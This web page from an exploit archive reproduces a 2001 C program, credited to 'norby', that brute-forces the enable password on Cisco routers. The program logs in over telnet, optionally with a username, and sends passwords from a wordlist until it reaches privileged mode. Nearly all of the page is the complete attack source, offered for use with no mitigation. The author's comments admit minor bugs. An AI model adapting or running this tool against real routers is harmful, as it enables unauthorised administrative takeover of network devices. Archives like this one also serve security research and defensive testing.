Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Cisco Internal Bruteforcer - exploit.company
header-logo
Suggest Exploit
vendor:
Cisco Router
by:
norby
N/A
CVSS
N/A
Password Bruteforcing
CWE
Product Name: Cisco Router
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2001

Cisco Internal Bruteforcer

This program logs into a CISCO router and tries a list of passwords looking for the enable one. It works in password-only CISCO as well as login-pass ones and has been successfully tested on many 2600 and a few 12008 routers. The program's concept is quite simple, bruteforcing a router for gaining enable access. This program has not been seen before.

Mitigation:

Source

Exploit-DB raw data:

/*

             .: free source :. .: coded 4 Avatar Corp :.

        enabler.                      
        cisco internal bruteforcer.                    

                                             coder - norby   
                                           concept - anyone

    
  this program just logs into a CISCO router and tries a list of 
  passes looking for the enable one.
  it works in password-only CISCO as well in login-pass ones and 
  has been succesfully tested on many 2600 and a few 12008.
  the prog's concept [bruteforcing a router for gaining enable access] 
  is quite simple ...how amazing I haven't seen similar progs before!

  anti eleet&0day force ;)
  anyway... information wants to be free :) 

                      sciao belli

               saluti a berserker mandarine, acidcrash
               beho x la traduzione :)                                    

          norby
               saluti a *lei*, saluti a gabriella che a capodanno
               non ha voluto lasciare il ragazzo x fare un bambino con me ;) 
               saluti a tutti gli avatar, a sandman, a tutte le diecimila
               persone che conosco
          any
               saluti a Acida, storm\, Raid

 contact`    norby - staff22@infinito.it      anyone - anyone@anyone.org
                www.avatarcorp.org 


neural collapse _ i truly hope in this project

v1 02/10/2k+1
todo for v2: use of threads, implement a passlist recovery 
            (very simple feature)     
*/



#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>

#define BOX                     "\033[0m\033[34;1m[\033[0m\033[37;1m`\033[0m\033[34;1m]"

struct sockaddr_in addr;
char host[100];
struct hostent *hp;
int sock_stat;

int n,x;
char **password;

char resolve(char *inputhost) {

    int a,b,c,d;

    if (sscanf(inputhost,"%d.%d.%d.%d",&a,&b,&c,&d) !=4) {
       hp = gethostbyname(inputhost);
       if (hp == NULL) { printf("%s error on host resolving\n\033[0m\n", BOX); exit(0); }
       sprintf(host,"%d.%d.%d.%d",(unsigned char)hp->h_addr_list[0][0],
                                  (unsigned char)hp->h_addr_list[0][1],
                                  (unsigned char)hp->h_addr_list[0][2],
                                  (unsigned char)hp->h_addr_list[0][3]);
    }
    else { strncpy(host,inputhost,100); }
}
 
int sock(char *hostoresolve,int port) {

    int err;
 
    sock_stat = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sock_stat<0) { printf("%s error opening socket\n\033[0m\n", BOX); exit(0); }

    addr.sin_family = PF_INET;
    addr.sin_port = htons(port);
    addr.sin_addr.s_addr = inet_addr(host);

    err = connect(sock_stat, (struct sockaddr *) &addr, sizeof(addr));
    if (err < 0) { printf("%s error opening connection\n\033[0m\n", BOX); exit(0); }
}

int banner() {
    printf("\n%s enabler.\n", BOX); 
    printf("%s         cisco internal bruteforcer. concept by anyone\n", BOX); 
    printf("%s                                       coded by norby\n", BOX);
}
int usage(char *argv) { printf("%s usage: %s <ip> [-u user] <pass> <passlist> [port]\n\n\033[0m", BOX, argv); }

void sig() { 
     if(n>0) { printf("%s %i passwords tryed. no password matching. leaving\n",BOX,n); }
     printf("\n\033[0m"); exit(0);
}

int login(char *login, char *pass) {

    char *input = malloc(4000);
    int reqlogin;

    while (read (sock_stat, input, 4000) > 0) {      
     if(strstr(input,"ogin:")||strstr(input,"sername:")) { 
        if(!strcmp(login,"n0login")) { 
          printf("%s username needed... give me a username next time :)\n\n\033[0m", BOX); 
          exit(0);
        }
        printf("%s login requested. sending [%s] and [%s]\n", BOX, login, pass); reqlogin=1; break; 
     } 
     if(strstr(input,"assword:")) { printf("%s only password needed. sending [%s]\n", BOX, pass); reqlogin=0; break; } 
     bzero(input,4000);
    }

    if(reqlogin==1) {
      write(sock_stat,login,strlen(login)); 
      write(sock_stat,"\r\n",2);

      while(read(sock_stat,input,4000)>0) {
        if(strstr(input,"assword")); { break; }
      }
    }

    write(sock_stat,pass,strlen(pass)); 
    write(sock_stat,"\r\n",2);

    sleep(2);

    bzero(input,4000);

    while (read (sock_stat, input, 4000) > 0) {
      if(strstr(input,">")) { printf("%s seems we are logged in :)\n", BOX); break; }
  /*    if(strstr(input,"assword:")) {  
        printf("%s sorry... [%s] is not a good password for login :?n\033[0m\n",BOX,pass); exit(0); 
      }*/ 
      if(strstr(input,"sername:")) {
        printf("%s sorry... [%s] is not a good password for login :?n\033[0m\n",BOX,pass); exit(0);
      }
      bzero(input,4000);
    }
}

int loadwordlist(char *list) {
 
   FILE   *passlist;
   char   buf[32], fake; 
   int i,z;

   if ((passlist = fopen(list, "r")) == NULL) { 
      printf("%s sorry, unable to open the passlist [%s]\n\033[0m\n", BOX,list); 
      exit(0); 
   }

   (void)fseek(passlist, 0L, SEEK_END);       // cazz questo e' uno smanettamento mentale  
   password = malloc(ftell(passlist));        // per fare allocare solo la memoria giusta x la passlist :P
   if(password == NULL) { 
     printf("%s sorry, can't allocate memory for passlist. buy more ram or cut the passlist\n\033[0m\n",BOX);
     exit(0);
   }  

   (void)fseek(passlist, 0L, SEEK_SET);

   while (!feof(passlist)) {
     fgets(buf, 32, passlist);
     if (buf[0] == '#' || buf[0] == '\n') continue;
     for (i = 0; i < strlen(buf); i++)
         if (buf[i] == '\n') buf[i] = '\0';
     password[x] = malloc(32);
     strcpy(password[x], buf);
     memset(buf, 0, 32);
     x++;
   }
   password[x] = 0x0;
   fclose(passlist);
   if(x<4) { printf("%s sorry, but passlist must contain at least 3 passwords. leaving \n\033[0m\n",BOX); exit(0); }

}

int brute() {  // there is a stupid error... the last password is tryed 2 times... must be fixed... ;)         
   
   char *input = malloc(100);
   int N;

   bzero(input,100);

   write(sock_stat,"enable",6);
   write(sock_stat,"\r\n",2);


   while(1) { 

     while(read(sock_stat,input,100)>0) {
       if(n==x) { printf("%s %i passwords tried. no valid password found in the passlist\n\033[0m\n",BOX,n-1); exit(0); }
       if(n+1==x) break;
       if(strstr(input,"assword:")||strstr(input,"#")||strstr(input,">")) break;
       bzero(input,100);
     }
   
     if(strstr(input,"#")) { printf("%s possible password found: %s\n\033[0m\n",BOX,password[n-1]); exit(0); }

     if(strstr(input,"assword:")) {
       write(sock_stat,password[n],strlen(password[n]));
       write(sock_stat,"\r\n",2);
       n++; 
       bzero(input,100); 
       if(n>1) printf("%s %s... wrong password\n", BOX, password[n-2]); fflush(stdout); 
       continue;
     } 
     if(strstr(input,">")) {
       write(sock_stat,"enable\r\n",8); bzero(input,100); 
     }
   }
}

int main(int argc, char *argv[]) {

    int port; 
     
    signal(SIGINT, sig);

    banner(); 
    if((argc<=3)||(argc>=8)) { usage(argv[0]); exit(0); }

    if(!strcmp(argv[2],"-u")) {
      if(argc==6) { port=atoi("23"); }
      else { port=atoi(argv[6]); } // c'e' uno stupido errore qua di argc che nn ho voglia di trovare
                                   // c'ho cosetta nella testa :?-- Corretto :) 

      printf("%s\n",BOX);

      loadwordlist(argv[5]);
      resolve(argv[1]);
      sock(host, port);
      login(argv[3],argv[4]);
      brute();
    }

    else {
      if(argc==4) { port=atoi("23"); }
      else { port=atoi(argv[4]); }
      printf("%s\n",BOX);

      loadwordlist(argv[3]);
      resolve(argv[1]);
      sock(host, port);
      login("n0login",argv[2]);
      brute();
    }
} 


// milw0rm.com [2001-01-19]

Navigation

Suggest Exploit

Services By CQR